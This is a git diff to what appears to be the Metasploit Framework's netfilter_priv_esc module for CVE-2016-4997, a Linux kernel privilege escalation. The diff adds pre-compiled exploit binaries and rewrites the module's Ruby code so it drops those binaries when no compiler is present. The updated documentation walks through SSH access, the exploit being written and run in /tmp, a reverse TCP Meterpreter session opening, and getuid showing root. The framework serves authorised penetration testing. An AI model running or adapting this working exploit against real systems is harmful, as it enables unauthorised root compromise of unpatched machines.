diff --git a/data/exploits/CVE-2016-4997/2016-4997-decr.out b/data/exploits/CVE-2016-4997/2016-4997-decr.out new file mode 100644 index 0000000000..60390352a0 Binary files /dev/null and b/data/exploits/CVE-2016-4997/2016-4997-decr.out differ diff --git a/data/exploits/CVE-2016-4997/2016-4997-pwn.out b/data/exploits/CVE-2016-4997/2016-4997-pwn.out new file mode 100644 index 0000000000..343bbfacf3 Binary files /dev/null and b/data/exploits/CVE-2016-4997/2016-4997-pwn.out differ diff --git a/documentation/modules/exploit/linux/local/netfilter_priv_esc.md b/documentation/modules/exploit/linux/local/netfilter_priv_esc.md index 426e4cc6ac..42e0294dd7 100644 --- a/documentation/modules/exploit/linux/local/netfilter_priv_esc.md +++ b/documentation/modules/exploit/linux/local/netfilter_priv_esc.md @@ -9,15 +9,14 @@ This module (and the original exploit) are written in two parts: desc, and pwn. There are a few requirements for this module to work (ubuntu): 1. ip_tables.ko has to be loaded (root running iptables -L will do such) - 2. libc6-dev-i386 needs to be installed to compile - 3. shem and sham can not be installed/running + 2. shem and sham can not be installed/running This module has been tested against: 1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic) 2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic -This does not work against the following vulnerable systems. Additional work may be required. +This does not work against the following vulnerable systems. Additional work may be required to the binary and C code to enable these targets. 1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18) 2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19) @@ -28,7 +27,7 @@ This does not work against the following vulnerable systems. Additional work ma 1. Start msfconsole 2. Exploit a box via whatever method - 4. Do: `use exploit/linux/local/ubuntu_netfilter` + 4. Do: `use exploit/linux/local/netfilter_priv_esc` 5. Do: `set session #` 6. Do: `set verbose true` 7. Do: `exploit` @@ -51,7 +50,7 @@ This does not work against the following vulnerable systems. Additional work ma ### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic) -Initial Access +#### Initial Access msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 127.0.0.1 @@ -69,68 +68,151 @@ Initial Access [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -Escalate +#### Escalate - msf auxiliary(ssh_login) > use exploit/linux/local/ubuntu_netfilter - msf exploit(ubuntu_netfilter) > set session 1 - session => 1 - msf exploit(ubuntu_netfilter) > set verbose true - verbose => true - msf exploit(ubuntu_netfilter) > exploit - - [*] Started reverse TCP handler on 172.20.14.188:4444 - [*] Checking if libc6-dev-i386 is installed + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed [+] libc6-dev-i386 is installed - [*] Checking if ip_tables.ko is loaded + [+] gcc-multilib is installed + [+] gcc is installed + [*] Live compiling exploit on system + [*] Checking if ip_tables is loaded in kernel [+] ip_tables.ko is loaded [*] Checking if shem or sham are installed [+] shem and sham not present. - [*] Writing desc executable to /tmp/452xNomE.c + [*] Writing desc executable to /tmp/fI1xW1Js.c [*] Max line length is 65537 - [*] Writing 3484 bytes in 1 chunks of 12068 bytes (octal-encoded), using printf - [*] Executing /tmp/452xNomE, may take around 35s to finish. Watching for /tmp/rrOA1xsB to be created. + [*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf + [*] Executing /tmp/fI1xW1Js, may take around 35s to finish. Watching for /tmp/GWqpwKnG to be created. [*] Waited 0s so far [*] Waited 10s so far [*] Waited 20s so far [*] Waited 30s so far [+] desc finished, env ready. - [*] Writing payload to /tmp/HbFVMTZM + [*] Writing payload to /tmp/Thzyfenv [*] Max line length is 65537 [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf - [*] Writing pwn executable to /tmp/eRFqvuyG.c + [*] Writing pwn executable to /tmp/wmfFiQKu.c [*] Max line length is 65537 - [*] Writing 1418 bytes in 1 chunks of 4975 bytes (octal-encoded), using printf + [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf [*] Transmitting intermediate stager for over-sized stage...(105 bytes) - [*] Sending stage (1495599 bytes) to 172.20.14.188 - [*] Meterpreter session 2 opened (172.20.14.188:4444 -> 172.20.14.188:45114) at 2016-09-16 01:16:52 -0400 + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400 + [+] Deleted /tmp/fI1xW1Js.c + [+] Deleted /tmp/GWqpwKnG + [+] Deleted /tmp/fI1xW1Js + [+] Deleted /tmp/Thzyfenv + [+] Deleted /tmp/wmfFiQKu.c + [+] Deleted /tmp/wmfFiQKu + meterpreter > sysinfo + Computer : ubuntu + OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64) + Architecture : x86_64 + Meterpreter : x86/linux meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 -### Re-exploit +#### Escalate w/ pre-compiled binaries -In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again. - - msf exploit(ubuntu_netfilter) > set reexploit true - reexploit => true - msf exploit(ubuntu_netfilter) > set session 2 - session => 2 - msf exploit(ubuntu_netfilter) > exploit + msf exploit(netfilter_priv_esc) > exploit - [*] Started reverse TCP handler on 172.20.14.188:4445 - [*] Checking if libc6-dev-i386 is installed - [+] libc6-dev-i386 is installed - [*] Checking if ip_tables.ko is loaded + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed + [-] libc6-dev-i386 is not installed. Compiling will fail. + [-] gcc-multilib is not installed. Compiling will fail. + [-] gcc is not installed. Compiling will fail. + [*] Dropping pre-compiled exploit on system + [*] Checking if ip_tables is loaded in kernel [+] ip_tables.ko is loaded [*] Checking if shem or sham are installed [+] shem and sham not present. - [*] Writing payload to /tmp/OblBUbtc - [*] Writing pwn executable to /tmp/u4PnMEdw.c + [*] Max line length is 65537 + [*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf + [*] Executing /tmp/8lQZGJdL, may take around 35s to finish. Watching for /tmp/okDjTFSS to be created. + [*] Waited 0s so far + [*] Waited 10s so far + [*] Waited 20s so far + [*] Waited 30s so far + [+] desc finished, env ready. + [*] Writing payload to /tmp/2016_4997_payload + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Writing pwn executable to /tmp/nOO6sYqi + [*] Max line length is 65537 + [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf [*] Transmitting intermediate stager for over-sized stage...(105 bytes) - [*] Sending stage (1495599 bytes) to 172.20.14.188 - [*] Meterpreter session 3 opened (172.20.14.188:4445 -> 172.20.14.188:40370) at 2016-09-17 13:35:57 -0400 - [+] Deleted /tmp/OblBUbtc - [+] Deleted /tmp/u4PnMEdw.c - [+] Deleted /tmp/u4PnMEdw - [-] Exploit failed: Rex::TimeoutError Operation timed out. - [*] Exploit completed, but no session was created. + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400 + [+] Deleted /tmp/okDjTFSS + [+] Deleted /tmp/2016_4997_payload + [+] Deleted /tmp/nOO6sYqi + + meterpreter > sysinfo + Computer : ubuntu + OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64) + Architecture : x86_64 + Meterpreter : x86/linux + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 + +#### Re-exploit + +In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again. + + msf exploit(netfilter_priv_esc) > set reexploit true + reexploit => true + msf exploit(netfilter_priv_esc) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed + [+] libc6-dev-i386 is installed + [+] gcc-multilib is installed + [+] gcc is installed + [*] Live compiling exploit on system + [*] Checking if ip_tables is loaded in kernel + [+] ip_tables.ko is loaded + [*] Checking if shem or sham are installed + [+] shem and sham not present. + [*] Writing payload to /tmp/egMfQrrI + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Writing pwn executable to /tmp/Yf8CAdMu.c + [*] Max line length is 65537 + [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf + [*] Transmitting intermediate stager for over-sized stage...(105 bytes) + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400 + [+] Deleted /tmp/egMfQrrI + [+] Deleted /tmp/Yf8CAdMu.c + [+] Deleted /tmp/Yf8CAdMu + + meterpreter > + +#### Re-exploit w/ pre-compiled binaries + + msf exploit(netfilter_priv_esc) > set reexploit true + reexploit => true + msf exploit(netfilter_priv_esc) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed + [+] libc6-dev-i386 is installed + [-] gcc-multilib is not installed. Compiling will fail. + [-] gcc is not installed. Compiling will fail. + [*] Dropping pre-compiled exploit on system + [*] Checking if ip_tables is loaded in kernel + [+] ip_tables.ko is loaded + [*] Checking if shem or sham are installed + [+] shem and sham not present. + [*] Writing payload to /tmp/2016_4997_payload + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Writing pwn executable to /tmp/SZrv2NOR + [*] Max line length is 65537 + [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf + [*] Transmitting intermediate stager for over-sized stage...(105 bytes) + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400 + + meterpreter > diff --git a/modules/exploits/linux/local/netfilter_priv_esc.rb b/modules/exploits/linux/local/netfilter_priv_esc.rb index 20c8ec1ec3..279b361491 100644 --- a/modules/exploits/linux/local/netfilter_priv_esc.rb +++ b/modules/exploits/linux/local/netfilter_priv_esc.rb @@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Local pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/, "execl(\"#{payload_path}\", NULL);") - def pwn(payload_path, pwn_file, pwn) + def pwn(payload_path, pwn_file, pwn, compile) # lets write our payload since everythings set for priv esc vprint_status("Writing payload to #{payload_path}") write_file(payload_path, generate_payload_exe) @@ -352,43 +352,55 @@ class MetasploitModule < Msf::Exploit::Local register_file_for_cleanup(payload_path) # now lets drop part 2, and finish up. - print_status "Writing pwn executable to #{pwn_file}.c" rm_f pwn_file - rm_f "#{pwn_file}.c" - write_file("#{pwn_file}.c", pwn) - cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}") - register_file_for_cleanup("#{pwn_file}.c") + if compile + print_status "Writing pwn executable to #{pwn_file}.c" + rm_f "#{pwn_file}.c" + write_file("#{pwn_file}.c", pwn) + cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}") + register_file_for_cleanup("#{pwn_file}.c") + else + print_status "Writing pwn executable to #{pwn_file}" + write_file(pwn_file, pwn) + end register_file_for_cleanup(pwn_file) cmd_exec("chmod +x #{pwn_file}; #{pwn_file}") end if not compile # we need to override with our pre-created binary # pwn file - path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-2') + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') fd = ::File.open( path, "rb") pwn = fd.read(fd.stat.size) fd.close # desc file - path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-1') + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') fd = ::File.open( path, "rb") decr = fd.read(fd.stat.size) fd.close + + # overwrite the hardcoded variable names in the compiled versions + env_ready_file = '/tmp/okDjTFSS' + payload_path = '/tmp/2016_4997_payload' end # check for shortcut if datastore['REEXPLOIT'] - pwn(payload_path, pwn_file, pwn) + pwn(payload_path, pwn_file, pwn, compile) else - print_status "Writing desc executable to #{desc_file}.c" - rm_f env_ready_file - rm_f "#{desc_file}.c" rm_f desc_file - write_file("#{desc_file}.c", decr) - output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}") - + if compile + print_status "Writing desc executable to #{desc_file}.c" + rm_f "#{desc_file}.c" + write_file("#{desc_file}.c", decr) + register_file_for_cleanup("#{desc_file}.c") + output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}") + else + write_file(desc_file, decr) + end + rm_f env_ready_file register_file_for_cleanup(env_ready_file) - register_file_for_cleanup("#{desc_file}.c") - register_file_for_cleanup(desc_file) + #register_file_for_cleanup(desc_file) if not file_exist?(desc_file) vprint_error("gcc failure output: #{output}") fail_with(Failure::Unknown, "#{desc_file}.c failed to compile") @@ -409,7 +421,7 @@ class MetasploitModule < Msf::Exploit::Local if file_exist?(env_ready_file) print_good("desc finished, env ready.") - pwn(payload_path, pwn_file, pwn) + pwn(payload_path, pwn_file, pwn, compile) return end sec_waited +=1